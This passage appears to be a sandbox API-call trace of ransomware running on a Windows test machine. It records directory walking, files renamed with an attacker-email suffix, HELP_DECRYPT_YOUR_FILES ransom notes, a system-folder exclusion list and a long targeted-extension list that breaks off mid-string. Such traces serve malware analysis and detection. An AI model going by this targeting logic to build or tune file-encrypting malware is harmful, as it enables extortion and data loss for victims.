	[0187.487] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x893bee94, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x894577ce, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0187.487] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0187.488] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89372fa6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89372fa6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x893bee94, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x42410, dwReserved0=0x0, dwReserved1=0x0, cFileName="achoo@gdllo.de.pst.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="ACHOO@~1.SCL")) returned 1
	[0187.488] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x894577ce, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x894577ce, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x894577ce, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0187.488] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8943162c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8943162c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x894577ce, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0187.488] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8943162c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8943162c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x894577ce, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0187.488] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0187.488] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0187.489] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88786d46, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x88786d46, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x88786d46, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x3570, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pacjpuc.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PACJPU~1.SCL")) returned 1
	[0187.489] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88aa7ffe, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x88aa7ffe, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x88aa7ffe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x2fe0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pqfubbksg c8n6wqpml.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PQFUBB~1.SCL")) returned 1
	[0187.489] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88af43f8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x88af43f8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x88af43f8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pua1eq-hg-njginjnl.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PUA1EQ~1.SCL")) returned 1
	[0187.489] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88da2ed3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x88da2ed3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x88da2ed3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vnt7g2bfzefn4rcpt3r.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="VNT7G2~1.SCL")) returned 1
	[0187.489] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88e3b868, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x88e3b868, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x88e6193b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x16470, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wc7c7gil2.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="WC7C7G~1.SCL")) returned 1
	[0187.489] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88ed3fcb, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x88ed3fcb, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x88ed3fcb, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd910, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xjlgdz7aaqlp90.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="XJLGDZ~1.SCL")) returned 1
	[0187.489] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3cc7350, ftCreationTime.dwHighDateTime=0x1d97311, ftLastAccessTime.dwLowDateTime=0x58e72050, ftLastAccessTime.dwHighDateTime=0x1d9736a, ftLastWriteTime.dwLowDateTime=0x58e72050, ftLastWriteTime.dwHighDateTime=0x1d9736a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XmrBEk9xVyp4RZta6St", cAlternateFileName="XMRBEK~1")) returned 1
	[0187.489] lstrcmpW (lpString1="XmrBEk9xVyp4RZta6St", lpString2="..") returned 1
	[0187.489] lstrcmpW (lpString1="XmrBEk9xVyp4RZta6St", lpString2=".") returned 1
	[0187.490] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned="C:\\Users\\RDhJ0CNFevzX\\Documents"
	[0187.490] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0187.490] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="XmrBEk9xVyp4RZta6St" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St"
	[0187.490] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St"
	[0187.490] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0187.490] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0187.490] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\*.*"
	[0187.490] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3cc7350, ftCreationTime.dwHighDateTime=0x1d97311, ftLastAccessTime.dwLowDateTime=0x58e72050, ftLastAccessTime.dwHighDateTime=0x1d9736a, ftLastWriteTime.dwLowDateTime=0x58e72050, ftLastWriteTime.dwHighDateTime=0x1d9736a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0187.491] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\*.*") returned 55
	[0187.491] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0187.491] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*") returned 0x37
	[0187.491] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.491] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="windows") returned 0x0
	[0187.492] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.492] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="boot") returned 0x0
	[0187.492] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.492] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="system volume information") returned 0x0
	[0187.492] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.492] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0187.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.493] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="temp") returned 0x0
	[0187.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.493] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="program files") returned 0x0
	[0187.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.493] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="program files (x86)") returned 0x0
	[0187.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.494] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="appdata") returned 0x0
	[0187.494] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.494] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="application data") returned 0x0
	[0187.494] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.494] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="winnt") returned 0x0
	[0187.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.496] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="tmp") returned 0x0
	[0187.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.496] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="cache") returned 0x0
	[0187.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.497] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="temporary internet files") returned 0x0
	[0187.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.497] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="webcache") returned 0x0
	[0187.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.497] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="inetcache") returned 0x0
	[0187.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.498] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="nvidia") returned 0x0
	[0187.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.498] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="packages") returned 0x0
	[0187.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.498] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="cookies") returned 0x0
	[0187.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.498] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\*.*", lpSrch="programdata") returned 0x0
	[0187.499] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3cc7350, ftCreationTime.dwHighDateTime=0x1d97311, ftLastAccessTime.dwLowDateTime=0x58e72050, ftLastAccessTime.dwHighDateTime=0x1d9736a, ftLastWriteTime.dwLowDateTime=0x58e72050, ftLastWriteTime.dwHighDateTime=0x1d9736a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0187.499] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ec747d0, ftCreationTime.dwHighDateTime=0x1d968c0, ftLastAccessTime.dwLowDateTime=0x3d93b9e0, ftLastAccessTime.dwHighDateTime=0x1d97508, ftLastWriteTime.dwLowDateTime=0x3d93b9e0, ftLastWriteTime.dwHighDateTime=0x1d97508, nFileSizeHigh=0x0, nFileSizeLow=0xac5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="0AHAK j1pIzVK7Bc.docx", cAlternateFileName="0AHAKJ~1.DOC")) returned 1
	[0187.499] lstrcmpW (lpString1="0AHAK j1pIzVK7Bc.docx", lpString2="..") returned 1
	[0187.499] lstrcmpW (lpString1="0AHAK j1pIzVK7Bc.docx", lpString2=".") returned 1
	[0187.499] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0187.499] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="0AHAK j1pIzVK7Bc.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\0AHAK j1pIzVK7Bc.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\0AHAK j1pIzVK7Bc.docx"
	[0187.499] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\0AHAK j1pIzVK7Bc.docx") returned 73
	[0187.500] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0187.500] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\0AHAK j1pIzVK7Bc.docx", cchLength=0x49 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx") returned 0x49
	[0187.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.500] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0187.500] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx"
	[0187.500] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx") returned 73
	[0187.500] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.501] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.501] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0187.501] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.501] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.se